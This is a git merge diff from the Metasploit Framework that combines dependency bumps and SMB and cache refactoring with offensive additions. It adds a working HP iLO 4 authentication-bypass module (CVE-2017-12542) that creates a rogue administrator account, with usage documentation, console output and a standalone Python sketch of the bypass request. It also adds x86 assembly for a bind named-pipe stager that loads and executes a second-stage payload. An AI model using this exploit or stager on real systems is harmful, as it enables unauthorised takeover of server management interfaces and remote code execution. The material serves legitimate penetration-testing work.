Merge branch 'rapid7/master' into goliath
commit 6b3a4a56dc

Gemfile.lock | 14
@@ -110,7 +110,7 @@ GEM
     backports (3.11.1)
     bcrypt (3.1.11)
     bcrypt_pbkdf (1.0.0)
-    bindata (2.4.2)
+    bindata (2.4.3)
     bit-struct (0.16)
     builder (3.2.3)
     coderay (1.1.2)
@@ -119,7 +119,7 @@ GEM
     daemons (1.2.4)
     diff-lcs (1.3)
     dnsruby (1.60.2)
-    docile (1.1.5)
+    docile (1.3.0)
     erubis (2.7.0)
     eventmachine (1.2.3)
     factory_girl (4.9.0)
@@ -159,7 +159,7 @@ GEM
     logging (2.2.2)
       little-plugger (~> 1.1)
       multi_json (~> 1.10)
-    loofah (2.2.0)
+    loofah (2.2.2)
       crass (~> 1.0.2)
       nokogiri (>= 1.5.9)
     memoist (0.16.0)
@@ -252,7 +252,7 @@ GEM
       activesupport (= 4.2.10)
       rake (>= 0.8.7)
       thor (>= 0.18.1, < 2.0)
-    rake (12.3.0)
+    rake (12.3.1)
     rb-readline (0.5.5)
     recog (2.1.18)
       nokogiri
@@ -293,7 +293,7 @@ GEM
       metasm
       rex-core
       rex-text
-    rex-socket (0.1.10)
+    rex-socket (0.1.12)
       rex-core
     rex-sslscan (0.1.5)
       rex-core
@@ -343,8 +343,8 @@ GEM
       faraday (~> 0.9)
       jwt (>= 1.5, < 3.0)
       multi_json (~> 1.10)
-    simplecov (0.15.1)
-      docile (~> 1.1.0)
+    simplecov (0.16.1)
+      docile (~> 1.1)
       json (>= 1.8, < 3)
       simplecov-html (~> 0.10.0)
     simplecov-html (0.10.2)
Binary file not shown.
@@ -0,0 +1,42 @@
This module exploits CVE-2017-12542, an authentication bypass in HP iLO, to create an arbitrary administrator account. Exploited this way, the vulnerability is 100% stable.

## Verification Steps

1. Start `msfconsole`
2. `use auxiliary/admin/hp/hp_ilo_create_admin_account`
3. Set `RHOST`
4. Run `check` to verify that the remote host is vulnerable (the module tries to list accounts using the REST API)
5. Set `USERNAME` and `PASSWORD` to specify the new administrator account's credentials
6. Run `run` to create the account on the iLO

## Options

**USERNAME**

The username of the new administrator account. Defaults to a random string.

**PASSWORD**

The password of the new administrator account. Defaults to a random string.

## Scenarios

### New administrator account creation

```
msf > use auxiliary/admin/hp/hp_ilo_create_admin_account
msf auxiliary(admin/hp/hp_ilo_create_admin_account) > set RHOST 192.168.42.78
RHOST => 192.168.42.78
msf auxiliary(admin/hp/hp_ilo_create_admin_account) > check
[+] 192.168.42.78:443 The target is vulnerable.
msf auxiliary(admin/hp/hp_ilo_create_admin_account) > set USERNAME test_user
USERNAME => test_user
msf auxiliary(admin/hp/hp_ilo_create_admin_account) > set PASSWORD test_password
PASSWORD => test_password
msf auxiliary(admin/hp/hp_ilo_create_admin_account) > run

[*] Trying to create account test_user...
[+] Account test_user/test_password created successfully.
[*] Auxiliary module execution completed
msf auxiliary(admin/hp/hp_ilo_create_admin_account) >
```
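For reference, the `check` in step 4 boils down to a single unauthenticated REST request whose `Connection` header is 29 characters long; the module later in this diff builds the same request with `send_request_cgi`. Below is a minimal sketch of that request, assuming Python 3 with the `requests` library and a hypothetical target address; it illustrates the bypass and is not part of the module itself.

```
# Minimal sketch of the CVE-2017-12542 check request.
# Assumptions: Python 3, the 'requests' library, and a reachable iLO 4 at ILO_HOST.
import random
import string

import requests

ILO_HOST = "192.168.42.78"  # hypothetical address, matching the scenario above

# A 29-character Connection header triggers the buffer overflow that bypasses
# authentication on iLO 4 firmware 1.00-2.50.
bogus_connection = "".join(random.choices(string.ascii_letters + string.digits, k=29))

resp = requests.get(
    f"https://{ILO_HOST}/rest/v1/AccountService/Accounts",
    headers={"Connection": bogus_connection},
    verify=False,  # iLO ships with a self-signed certificate
    timeout=10,
)

# A vulnerable target answers the unauthenticated request with the account list.
print(resp.status_code)
print('"Description":"iLO User Accounts"' in resp.text)
```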
@@ -146,6 +146,33 @@ module Metasploit
         self.verbosity = :fatal if self.verbosity.nil?
       end
 
+      public
+
+      def get_platform(proof)
+        case proof
+        when /Linux/
+          'linux'
+        when /Darwin/
+          'osx'
+        when /SunOS/
+          'solaris'
+        when /BSD/
+          'bsd'
+        when /HP-UX/
+          'hpux'
+        when /AIX/
+          'aix'
+        when /Win32|Windows/
+          'windows'
+        when /Unknown command or computer name/
+          'cisco-ios'
+        when /unknown keyword/ # ScreenOS
+          'juniper'
+        when /JUNOS Base OS/ # JunOS
+          'juniper'
+        end
+      end
+
     end
   end
@@ -9,6 +9,7 @@ require 'rex/proto/smb/simpleclient'
 # 1) A peek named pipe operation is carried out before every read to prevent blocking. This
 #    generates extra traffic. SMB echo requests are also generated to force the packet
 #    dispatcher to perform a read.
+# 2) SMB1 only. Switch to ruby_smb.
 #
 #
@@ -23,21 +24,23 @@ require 'rex/proto/smb/simpleclient'
 # A peek operation on the pipe fixes this.
 #
 class OpenPipeSock < Rex::Proto::SMB::SimpleClient::OpenPipe
-  attr_accessor :mutex, :last_comm, :write_queue, :write_thread, :read_buff, :echo_thread, :server_max_buffer_size
+  attr_accessor :mutex, :last_comm, :write_queue, :write_thread, :read_buff, :echo_thread, :simple, :server_max_buffer_size
 
   STATUS_BUFFER_OVERFLOW = 0x80000005
+  STATUS_PIPE_BROKEN = 0xc000014b
 
-  def initialize(*args, server_max_buffer_size:)
+  def initialize(*args, simple:, server_max_buffer_size:)
     super(*args)
-    self.client = args[0]
+    self.simple = simple
+    self.client = simple.client
     self.mutex = Mutex.new        # synchronize read/writes
     self.last_comm = Time.now     # last successfull read/write
-    self.write_queue = Queue.new  # queue message to send
+    self.write_queue = Queue.new  # messages to send
     self.write_thread = Thread.new { dispatcher }
     self.echo_thread = Thread.new { force_read }
     self.read_buff = ''
-    self.server_max_buffer_size = server_max_buffer_size
-    self.chunk_size = server_max_buffer_size - 260
+    self.server_max_buffer_size = server_max_buffer_size  # max transaction size
+    self.chunk_size = server_max_buffer_size - 260        # max read/write size
   end
 
   # Check if there are any bytes to read and return number available. Access must be synchronized.
@@ -46,6 +49,9 @@ class OpenPipeSock < Rex::Proto::SMB::SimpleClient::OpenPipe
     setup = [0x23, self.file_id].pack('vv')
     # Must ignore errors since we expect STATUS_BUFFER_OVERFLOW
     pkt = self.client.trans_maxzero('\\PIPE\\', '', '', 2, setup, false, true, true)
+    if pkt['Payload']['SMB'].v['ErrorClass'] == STATUS_PIPE_BROKEN
+      raise IOError
+    end
     avail = 0
     begin
       avail = pkt.to_s[pkt['Payload'].v['ParamOffset']+4, 2].unpack('v')[0]
@@ -80,7 +86,7 @@ class OpenPipeSock < Rex::Proto::SMB::SimpleClient::OpenPipe
   # Runs as a thread and synchronizes writes. Allows write operations to return
   # immediately instead of waiting for the mutex.
   def dispatcher
-    while true
+    while not self.write_queue.closed?
       data = self.write_queue.pop
       self.mutex.synchronize do
         sent = 0
@@ -98,40 +104,38 @@ class OpenPipeSock < Rex::Proto::SMB::SimpleClient::OpenPipe
   # Intercepts the socket.close from the session manager when the session dies.
   # Cleanly terminates the SMB session and closes the socket.
   def close
+    self.echo_thread.kill rescue nil
     # Give the meterpreter shutdown command a chance
     self.write_queue.close
-    if self.write_queue.size > 0
-      sleep(1.0)
-    end
-    self.write_thread.kill
 
     begin
-      # close pipe
-      super
-    rescue => e
+      if self.write_thread.join(2.0)
+        self.write_thread.kill
+      end
+    rescue
     end
+
+    # close pipe, share, and socket
+    super rescue nil
+    self.simple.disconnect(self.simple.last_share) rescue nil
     self.client.socket.close
   end
 
   def read(count)
     data = ''
-    begin
-      if count > self.read_buff.length
-        # need more data to satisfy request
-        self.mutex.synchronize do
-          avail = peek_named_pipe
-          if avail > 0
-            left = [count-self.read_buff.length, avail].max
-            while left > 0
-              buff = super([left, self.chunk_size].min)
-              self.last_comm = Time.now
-              left -= buff.length
-              self.read_buff += buff
-            end
-          end
-        end
-      end
-    rescue
-    end
+    if count > self.read_buff.length
+      # need more data to satisfy request
+      self.mutex.synchronize do
+        avail = peek_named_pipe
+        if avail > 0
+          left = [count-self.read_buff.length, avail].max
+          while left > 0
+            buff = super([left, self.chunk_size].min)
+            self.last_comm = Time.now
+            left -= buff.length
+            self.read_buff += buff
+          end
+        end
+      end
+    end
 
     data = self.read_buff[0, [count, self.read_buff.length].min]
@@ -190,7 +194,8 @@ class SimpleClientPipe < Rex::Proto::SMB::SimpleClient
   def create_pipe(path)
     pkt = self.client.create_pipe(path, Rex::Proto::SMB::Constants::CREATE_ACCESS_EXIST)
     file_id = pkt['Payload'].v['FileID']
-    self.pipe = OpenPipeSock.new(self.client, path, self.client.last_tree_id, file_id, server_max_buffer_size: self.server_max_buffer_size)
+    self.pipe = OpenPipeSock.new(self.client, path, self.client.last_tree_id, file_id, simple: self,
+                                 server_max_buffer_size: self.server_max_buffer_size)
   end
 end
@@ -202,7 +207,7 @@ module Msf
 
   #
   # Returns the string representation of the handler type, in this case
-  # 'reverse_named_pipe'.
+  # 'bind_named_pipe'.
   #
   def self.handler_type
     "bind_named_pipe"
@@ -210,15 +215,15 @@ module Msf
 
   #
   # Returns the connection-described general handler type, in this case
-  # 'reverse'.
+  # 'bind'.
   #
   def self.general_handler_type
     "bind"
   end
 
   #
-  # Initializes the reverse handler and ads the options that are required
-  # for reverse named pipe payloads.
+  # Initializes the handler and ads the options that are required for
+  # bind named pipe payloads.
   #
   def initialize(info={})
     super
@@ -334,7 +339,7 @@ module Msf
       print_error("Failed to connect to pipe #{smbshare}")
       return
     end
 
     vprint_status("Opened pipe \\#{pipe_name}")
 
     # Increment the has connection counter
@@ -1,8 +1,43 @@
 import json
+import logging
 import os
 import sys
 
+
+class LogFormatter(logging.Formatter):
+    def __init__(self, prefix, *args, **kwargs):
+        super(LogFormatter, self).__init__(*args, **kwargs)
+        self.prefix = prefix
+
+    def format(self, record):
+        return self.prefix + record.msg
+
+
+class LogHandler(logging.Handler):
+    def emit(self, record):
+        level = 'debug'
+        if record.levelno >= logging.ERROR:
+            level = 'error'
+        elif record.levelno >= logging.WARNING:
+            level = 'warning'
+        elif record.levelno >= logging.INFO:
+            level = 'info'
+        log(self.format(record), level)
+        return
+
+    @classmethod
+    def setup(cls, level=logging.DEBUG, name=None, msg_prefix=None):
+        logger = logging.getLogger(name)
+        handler = cls()
+
+        if level is not None:
+            logger.setLevel(level)
+        if msg_prefix is not None:
+            handler.setFormatter(LogFormatter(msg_prefix))
+        logger.addHandler(handler)
+        return handler
+
+
 def log(message, level='info'):
     rpc_send({'jsonrpc': '2.0', 'method': 'message', 'params': {
         'level': level,
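The `LogHandler` added above routes standard-library `logging` records into the framework's JSON-RPC `message` notifications via the existing `log()` helper. A minimal usage sketch, under the assumption that this file is imported as the external-module support library (the import path, module name and prefix below are illustrative, not from this diff):

```
# Hypothetical external Python module using the LogHandler added above.
import logging

from metasploit import module  # assumed import path of the support library

# Attach the RPC-backed handler; every record at DEBUG or above is forwarded
# to the framework as a 'message' notification, prefixed for readability.
module.LogHandler.setup(level=logging.DEBUG, msg_prefix='[demo module] ')

logging.getLogger(__name__).info('scanning started')     # surfaces as an info message
logging.getLogger(__name__).error('connection refused')  # surfaces as an error message
```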
@@ -13,9 +13,9 @@ class Msf::Modules::External::Shim
       capture_server(mod)
     when 'dos'
       dos(mod)
-    when 'scanner.single'
+    when 'single_scanner'
       single_scanner(mod)
-    when 'scanner.multi'
+    when 'multi_scanner'
       multi_scanner(mod)
     else
       # TODO have a nice load error show up in the logs
@@ -16,12 +16,13 @@ class MetasploitModule < Msf::Auxiliary
     })
 
     register_options([
+      OptInt.new('batch_size', [false, 'Number of hosts to run in each batch', 200]),
       <%= meta[:options] %>
     ])
   end
 
   def run_batch_size
-    200
+    datastore['batch_size']
   end
 
   def run_batch(ips)
@@ -24,17 +24,21 @@ class Cache
   # Refreshes cached module metadata as well as updating the store
   #
   def refresh_metadata_instance(module_instance)
-    dlog "Refreshing #{module_instance.refname} of type: #{module_instance.type}"
-    refresh_metadata_instance_internal(module_instance)
-    update_store
+    @mutex.synchronize {
+      dlog "Refreshing #{module_instance.refname} of type: #{module_instance.type}"
+      refresh_metadata_instance_internal(module_instance)
+      update_store
+    }
   end
 
   #
   # Returns the module data cache, but first ensures all the metadata is loaded
   #
   def get_metadata
-    wait_for_load
-    @module_metadata_cache.values
+    @mutex.synchronize {
+      wait_for_load
+      @module_metadata_cache.values
+    }
   end
 
   #
@@ -42,41 +46,47 @@ class Cache
   # if there are changes.
   #
   def refresh_metadata(module_sets)
+    @mutex.synchronize {
       unchanged_module_references = get_unchanged_module_references
       has_changes = false
       module_sets.each do |mt|
         unchanged_reference_name_set = unchanged_module_references[mt[0]]
 
         mt[1].keys.sort.each do |mn|
           next if unchanged_reference_name_set.include? mn
 
           begin
             module_instance = mt[1].create(mn)
           rescue Exception => e
             elog "Unable to create module: #{mn}. #{e.message}"
           end
 
           unless module_instance
             wlog "Removing invalid module reference from cache: #{mn}"
             existed = remove_from_cache(mn)
             if existed
               has_changes = true
             end
             next
           end
 
           begin
             refresh_metadata_instance_internal(module_instance)
             has_changes = true
           rescue Exception => e
             elog("Error updating module details for #{module_instance.fullname}: #{$!.class} #{$!} : #{e.message}")
           end
         end
       end
 
       update_store if has_changes
+    }
   end
 
+  #######
+  private
+  #######
+
   #
   # Returns a hash(type->set) which references modules that have not changed.
   #
|
||||||
return skip_reference_name_set_by_module_type
|
return skip_reference_name_set_by_module_type
|
||||||
end
|
end
|
||||||
|
|
||||||
#######
|
|
||||||
private
|
|
||||||
#######
|
|
||||||
|
|
||||||
def remove_from_cache(module_name)
|
def remove_from_cache(module_name)
|
||||||
old_cache_size = @module_metadata_cache.size
|
old_cache_size = @module_metadata_cache.size
|
||||||
@module_metadata_cache.delete_if {|_, module_metadata|
|
@module_metadata_cache.delete_if {|_, module_metadata|
|
||||||
|
@ -140,6 +146,7 @@ class Cache
|
||||||
end
|
end
|
||||||
|
|
||||||
def initialize
|
def initialize
|
||||||
|
@mutex = Mutex.new
|
||||||
@module_metadata_cache = {}
|
@module_metadata_cache = {}
|
||||||
@store_loaded = false
|
@store_loaded = false
|
||||||
@console = Rex::Ui::Text::Output::Stdio.new
|
@console = Rex::Ui::Text::Output::Stdio.new
|
||||||
|
|
|
@@ -19,6 +19,10 @@ module Msf::Modules::Metadata::Store
     load_metadata
   end
 
+  #######
+  private
+  #######
+
   #
   # Update the module meta cache disk store
   #
@@ -32,10 +36,6 @@ module Msf::Modules::Metadata::Store
     end
   end
 
-  #######
-  private
-  #######
-
   def load_metadata
     begin
       retries ||= 0
@@ -0,0 +1,349 @@
# -*- coding: binary -*-

require 'msf/core'
require 'msf/core/payload/transport_config'
require 'msf/core/payload/windows/send_uuid'
require 'msf/core/payload/windows/block_api'
require 'msf/core/payload/windows/exitfunk'

module Msf

###
#
# bind_named_pipe payload generation for Windows ARCH_X86
#
###
module Payload::Windows::BindNamedPipe

  include Msf::Payload::TransportConfig
  include Msf::Payload::Windows
  include Msf::Payload::Windows::SendUUID
  include Msf::Payload::Windows::BlockApi
  include Msf::Payload::Windows::Exitfunk

  #
  # Register bind_named_pipe specific options
  #
  def initialize(*args)
    super
    register_advanced_options(
      [
        OptInt.new('WAIT_TIMEOUT', [false, 'Seconds pipe will wait for a connection', 10])
      ]
    )
  end

  #
  # Generate the first stage
  #
  def generate
    conf = {
      name:     datastore['PIPENAME'],
      host:     datastore['PIPEHOST'],
      timeout:  datastore['WAIT_TIMEOUT'],
      reliable: false,
    }

    # Generate the advanced stager if we have space
    unless self.available_space.nil? || required_space > self.available_space
      conf[:reliable] = true
      conf[:exitfunk] = datastore['EXITFUNC']
    end

    generate_bind_named_pipe(conf)
  end

  #
  # By default, we don't want to send the UUID, but we'll send
  # for certain payloads if requested.
  #
  def include_send_uuid
    false
  end

  #
  # Generate and compile the stager
  #
  def generate_bind_named_pipe(opts={})
    combined_asm = %Q^
      cld                    ; Clear the direction flag.
      call start             ; Call start, this pushes the address of 'api_call' onto the stack.
      #{asm_block_api}
      start:
        pop ebp              ; block API pointer
      #{asm_bind_named_pipe(opts)}
    ^
    Metasm::Shellcode.assemble(Metasm::X86.new, combined_asm).encode_string
  end

  def transport_config(opts={})
    transport_config_bind_named_pipe(opts)
  end

  #
  # Determine the maximum amount of space required for the features requested
  #
  def required_space
    # Start with our cached default generated size
    space = cached_size

    # EXITFUNK processing adds 31 bytes at most (for ExitThread, only ~16 for others)
    space += 31

    # Reliability adds bytes! +56 if exitfunk, otherwise +90
    #space += 56
    space += 90

    space += uuid_required_size if include_send_uuid

    # The final estimated size
    space
  end

  def uuid_required_size
    # TODO update this
    space = 0

    # UUID size
    space += 16
  end

  #
  # hPipe must be in edi. eax will contain WriteFile return value
  #
  def asm_send_uuid(uuid=nil)
    uuid ||= generate_payload_uuid
    uuid_raw = uuid.to_raw

    asm << %Q^
      send_uuid:
        push 0                  ; lpNumberOfBytesWritten
        push esp
        push #{uuid_raw.length} ; nNumberOfBytesToWrite
        call get_uuid_address   ; put uuid buffer on the stack
        db #{raw_to_db(uuid_raw)} ; lpBuffer
      get_uuid_address:
        push edi                ; hPipe
        push #{Rex::Text.block_api_hash('kernel32.dll', 'WriteFile')}
        call ebp                ; WriteFile(hPipe, lpBuffer, nNumberOfBytesToWrite, lpNumberOfBytesWritten)
    ^
  end

  #
  # Generate an assembly stub with the configured feature set and options.
  #
  # @option opts [String] :exitfunk The exit method to use if there is an error, one of process, thread, or seh
  # @option opts [Bool] :reliable Whether or not to enable error handling code
  # @option opts [String] :name Pipe name to create
  # @option opts [Int] :timeout Seconds to wait for pipe connection
  #
  def asm_bind_named_pipe(opts={})

    reliable       = opts[:reliable]
    timeout        = opts[:timeout] * 1000            # convert to millisecs
    retry_wait     = 500
    retry_count    = timeout / retry_wait
    full_pipe_name = "\\\\\\\\.\\\\pipe\\\\#{opts[:name]}" # double escape -> \\.\pipe\name
    chunk_size     = 0x10000                           # pipe buffer size
    cleanup_funk   = reliable ? 'cleanup_file' : 'failure'
    pipe_mode      = 1                                 # (PIPE_TYPE_BYTE|PIPE_NOWAIT|PIPE_READMODE_BYTE)

    asm = %Q^
      create_named_pipe:
        push 0                 ; lpSecurityAttributes. Default r/w for creator and administrators
        push 0                 ; nDefaultTimeOut
        push #{chunk_size}     ; nInBufferSize
        push #{chunk_size}     ; nOutBufferSize
        push 255               ; nMaxInstances (PIPE_UNLIMITED_INSTANCES). in case pipe isn't released
        push #{pipe_mode}      ; dwPipeMode
        push 3                 ; dwOpenMode (PIPE_ACCESS_DUPLEX)
        call get_pipe_name     ; lpName
        db "#{full_pipe_name}", 0x00
      get_pipe_name:
        push #{Rex::Text.block_api_hash('kernel32.dll', 'CreateNamedPipeA')}
        call ebp               ; CreateNamedPipeA(lpName, dwOpenMode, dwPipeMode, nMaxInstances, nOutBufferSize,
                               ;   nInBufferSize, nDefaultTimeOut, lpSecurityAttributes)
        mov edi, eax           ; save hPipe (using sockedi convention)

        ; check for failure
        cmp eax, -1            ; did it work? (INVALID_HANDLE_VALUE)
        jz failure

        ; initialize retry counter
        push #{retry_count}    ; retry counter
        pop esi

        ; Connect pipe to remote
      connect_pipe:
        push 0                 ; lpOverlapped
        push edi               ; hPipe
        push #{Rex::Text.block_api_hash('kernel32.dll', 'ConnectNamedPipe')}
        call ebp               ; ConnectNamedPipe(hPipe, lpOverlapped)

        ; check for failure
        push #{Rex::Text.block_api_hash('kernel32.dll', 'GetLastError')}
        call ebp               ; GetLastError()
        cmp eax, 0x217         ; looking for ERROR_PIPE_CONNECTED
        jz get_stage_size      ; success
        dec esi
        jz #{cleanup_funk}     ; out of retries

        ; wait before trying again
        push #{retry_wait}
        push #{Rex::Text.block_api_hash('kernel32.dll', 'Sleep')}
        call ebp               ; Sleep(millisecs)
        jmp connect_pipe
    ^

    asm << asm_send_uuid if include_send_uuid

    asm << 'get_stage_size:'

    # For reliability, set pipe state to wait so ReadFile blocks
    if reliable
      asm << %Q^
        push 0
        mov ecx, esp
        push 0                 ; lpCollectDataTimeout
        push 0                 ; lpMaxCollectionCount
        push ecx               ; lpMode (PIPE_WAIT)
        push edi               ; hPipe
        push #{Rex::Text.block_api_hash('kernel32.dll', 'SetNamedPipeHandleState')}
        call ebp               ; SetNamedPipeHandleState(hPipe, lpMode, lpMaxCollectionCount, lpCollectDataTimeout)
      ^
    end

    asm << %Q^
        ; read size of second stage
        sub esp, 8
        push 0                 ; lpOverlapped
        lea ebx, [esp+4]       ; lpNumberOfBytesRead
        push ebx
        push 4                 ; nNumberOfBytesToRead
        lea ecx, [esp+16]      ; lpBuffer
        push ecx
        push edi               ; hPipe
        push #{Rex::Text.block_api_hash('kernel32.dll', 'ReadFile')}
        call ebp               ; ReadFile(hPipe, lpBuffer, nNumberOfBytesToRead, lpNumberOfBytesRead, lpOverlapped)
        pop eax                ; lpNumberOfBytesRead
        pop esi                ; lpBuffer (stage size)
    ^

    if reliable
      asm << %Q^
        ; check for bytesRead == 4
        cmp eax, 4             ; expecting 4 bytes
        jnz cleanup_file
      ^
    end

    asm << %Q^
      get_second_stage:
        ; Alloc a RWX buffer for the second stage
        push 0x40              ; PAGE_EXECUTE_READWRITE
        push 0x1000            ; MEM_COMMIT
        push esi               ; dwLength
        push 0                 ; NULL as we dont care where the allocation is
        push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
        call ebp               ; VirtualAlloc(NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE)
    ^

    if reliable
      asm << %Q^
        test eax, eax          ; VirtualAlloc returning 0 is an error
        jz cleanup_file
      ^
    end

    asm << %Q^
        push eax               ; save stage base address
        mov ebx, eax           ; stage 2 buff ptr

      read_more:
        ; prepare the size min(0x10000, esi)
        mov edx, #{chunk_size}
        cmp edx, esi
        jle read_max           ; read chunk_size
        mov edx, esi           ; read remaining bytes
      read_max:
        push 0
        mov ecx, esp
        push 0                 ; lpOverlapped
        push ecx               ; lpNumberOfBytesRead
        push edx               ; nNumberOfBytesToRead
        push ebx               ; lpBuffer
        push edi               ; hPipe
        push #{Rex::Text.block_api_hash('kernel32.dll', 'ReadFile')}
        call ebp               ; ReadFile(hPipe, lpBuffer, nNumberOfBytesToRead, lpNumberOfBytesRead, lpOverlapped)
        pop edx                ; lpNumberOfBytesRead
    ^

    if reliable
      asm << %Q^
        ; check to see if the read worked
        test eax, eax
        jnz read_successful

        ; something failed so free up memory
        pop ecx
        push 0x4000            ; MEM_DECOMMIT
        push 0                 ; dwSize, 0 to decommit whole block
        push ecx               ; lpAddress
        push #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualFree')}
        call ebp               ; VirtualFree(payload, 0, MEM_DECOMMIT)

      cleanup_file:
        ; cleanup the pipe handle
        push edi               ; file handle
        push #{Rex::Text.block_api_hash('kernel32.dll', 'CloseHandle')}
        call ebp               ; CloseHandle(hPipe)

        jmp failure
      ^
    end

    asm << %Q^
      read_successful:
        add ebx, edx           ; buffer += bytes_received
        sub esi, edx           ; length -= bytes_received
        test esi, esi          ; check for 0 bytes left
        jnz read_more          ; continue if we have more to read

        pop ecx
        jmp ecx                ; jump into the second stage
    ^

    asm << 'failure:'

    if opts[:exitfunk]
      asm << %Q^
        call exitfunk
      ^
      asm << asm_exitfunk(opts)
    elsif reliable
      asm << %Q^
        call get_kernel32_name
        db "kernel32", 0x00
      get_kernel32_name:
        push #{Rex::Text.block_api_hash('kernel32.dll', 'GetModuleHandleA')}
        call ebp               ; GetModuleHandleA("kernel32")

        call get_exit_name
        db "ExitThread", 0x00
      get_exit_name:           ; lpProcName
        push eax               ; hModule
        push #{Rex::Text.block_api_hash('kernel32.dll', 'GetProcAddress')}
        call ebp               ; GetProcAddress(hModule, "ExitThread")
        push 0                 ; dwExitCode
        call eax               ; ExitProcess(0)
      ^
    else
      # run off the end
    end

    asm
  end

end

end
@@ -128,7 +128,7 @@ module Payload::Windows::BindNamedPipe_x64
        sub rsp, 16            ; allocate + alignment
        mov r9, rsp            ; lpNumberOfBytesWritten
        mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'WriteFile')}
-       call rbp
+       call rbp               ; WriteFile(hPipe, lpBuffer, nNumberOfBytesToWrite, lpNumberOfBytesWritten)
        add rsp, 16
     ^
   end
@@ -0,0 +1,111 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'HP iLO 4 1.00-2.50 Authentication Bypass Administrator Account Creation',
      'Description'    => %q{
        This module exploits an authentication bypass in HP iLO 4 1.00 to 2.50, triggered by a buffer
        overflow in the Connection HTTP header handling by the web server.
        Exploiting this vulnerability gives full access to the REST API, allowing arbitrary
        accounts creation.
      },
      'References'     =>
        [
          [ 'CVE', '2017-12542' ],
          [ 'BID', '100467' ],
          [ 'URL', 'https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03769en_us' ],
          [ 'URL', 'https://www.synacktiv.com/posts/exploit/hp-ilo-talk-at-recon-brx-2018.html' ]
        ],
      'Author'         =>
        [
          'Fabien Perigaud <fabien[dot]perigaud[at]synacktiv[dot]com>'
        ],
      'License'        => MSF_LICENSE,
      'DisclosureDate' => "Aug 24 2017",
      'DefaultOptions' => { 'SSL' => true }
    ))

    register_options(
      [
        Opt::RPORT(443),
        OptString.new('USERNAME', [true, 'Username for the new account', Rex::Text.rand_text_alphanumeric(8)]),
        OptString.new('PASSWORD', [true, 'Password for the new account', Rex::Text.rand_text_alphanumeric(12)])
      ])
  end

  def check
    begin
      res = send_request_cgi({
        'method'  => 'GET',
        'uri'     => '/rest/v1/AccountService/Accounts',
        'headers' => {
          "Connection" => Rex::Text.rand_text_alphanumeric(29)
        }
      })
    rescue
      return Exploit::CheckCode::Unknown
    end

    if res.code == 200 and res.body.include? '"Description":"iLO User Accounts"'
      return Exploit::CheckCode::Vulnerable
    end

    return Exploit::CheckCode::Safe
  end

  def run
    print_status("Trying to create account #{datastore["USERNAME"]}...")

    data = {}
    data["UserName"] = datastore["USERNAME"]
    data["Password"] = datastore["PASSWORD"]
    data["Oem"] = {}
    data["Oem"]["Hp"] = {}
    data["Oem"]["Hp"]["LoginName"] = datastore["USERNAME"]
    data["Oem"]["Hp"]["Privileges"] = {}
    data["Oem"]["Hp"]["Privileges"]["LoginPriv"] = true
    data["Oem"]["Hp"]["Privileges"]["RemoteConsolePriv"] = true
    data["Oem"]["Hp"]["Privileges"]["UserConfigPriv"] = true
    data["Oem"]["Hp"]["Privileges"]["VirtualMediaPriv"] = true
    data["Oem"]["Hp"]["Privileges"]["VirtualPowerAndResetPriv"] = true
    data["Oem"]["Hp"]["Privileges"]["iLOConfigPriv"] = true

    begin
      res = send_request_cgi({
        'method'  => 'POST',
        'uri'     => '/rest/v1/AccountService/Accounts',
        'ctype'   => 'application/json',
        'headers' => {
          "Connection" => Rex::Text.rand_text_alphanumeric(29)
        },
        'data' => data.to_json()
      })
    rescue Rex::ConnectionRefused
    end

    unless res
      fail_with(Failure::Unknown, 'Connection failed')
    end

    if res.body.include? 'InvalidPasswordLength'
      fail_with(Failure::BadConfig, "Password #{datastore["PASSWORD"]} is too short.")
    end

    if res.body.include? 'UserAlreadyExist'
      fail_with(Failure::BadConfig, "Unable to add login #{datastore["USERNAME"]}, user already exists")
    end

    unless res.code == 201
      fail_with(Failure::UnexpectedReply, "Unknown error while creating the user. Response: #{res.code}")
    end

    print_good("Account #{datastore["USERNAME"]}/#{datastore["PASSWORD"]} created successfully.")
  end
end
@@ -53,11 +53,11 @@ class MetasploitModule < Msf::Auxiliary
     datastore['RPORT']
   end
 
-  def session_setup(result, ssh_socket)
-    return unless ssh_socket
+  def session_setup(result, scanner)
+    return unless scanner.ssh_socket
 
     # Create a new session
-    conn = Net::SSH::CommandStream.new(ssh_socket)
+    conn = Net::SSH::CommandStream.new(scanner.ssh_socket)
 
     merge_me = {
       'USERPASS_FILE' => nil,
@@ -68,31 +68,10 @@ class MetasploitModule < Msf::Auxiliary
     }
     info = "#{proto_from_fullname} #{result.credential} (#{@ip}:#{rport})"
     s = start_session(self, info, merge_me, false, conn.lsock)
-    self.sockets.delete(ssh_socket.transport.socket)
+    self.sockets.delete(scanner.ssh_socket.transport.socket)
 
     # Set the session platform
-    case result.proof
-    when /Linux/
-      s.platform = "linux"
-    when /Darwin/
-      s.platform = "osx"
-    when /SunOS/
-      s.platform = "solaris"
-    when /BSD/
-      s.platform = "bsd"
-    when /HP-UX/
-      s.platform = "hpux"
-    when /AIX/
-      s.platform = "aix"
-    when /Win32|Windows/
-      s.platform = "windows"
-    when /Unknown command or computer name/
-      s.platform = "cisco-ios"
-    when /unknown keyword/ # ScreenOS
-      s.platform = "juniper"
-    when /JUNOS Base OS/ #JunOS
-      s.platform = "juniper"
-    end
+    s.platform = scanner.get_platform(result.proof)
 
     s
   end
@@ -140,7 +119,7 @@ class MetasploitModule < Msf::Auxiliary
         credential_core = create_credential(credential_data)
         credential_data[:core] = credential_core
         create_credential_login(credential_data)
-        session_setup(result, scanner.ssh_socket)
+        session_setup(result, scanner)
         :next_user
       when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
         vprint_brute :level => :verror, :ip => ip, :msg => "Could not connect: #{result.proof}"
@@ -68,11 +68,11 @@ class MetasploitModule < Msf::Auxiliary
     datastore['RHOST']
   end
 
-  def session_setup(result, ssh_socket, fingerprint)
-    return unless ssh_socket
+  def session_setup(result, scanner, fingerprint)
+    return unless scanner.ssh_socket
 
     # Create a new session from the socket
-    conn = Net::SSH::CommandStream.new(ssh_socket)
+    conn = Net::SSH::CommandStream.new(scanner.ssh_socket)
 
     # Clean up the stored data - need to stash the keyfile into
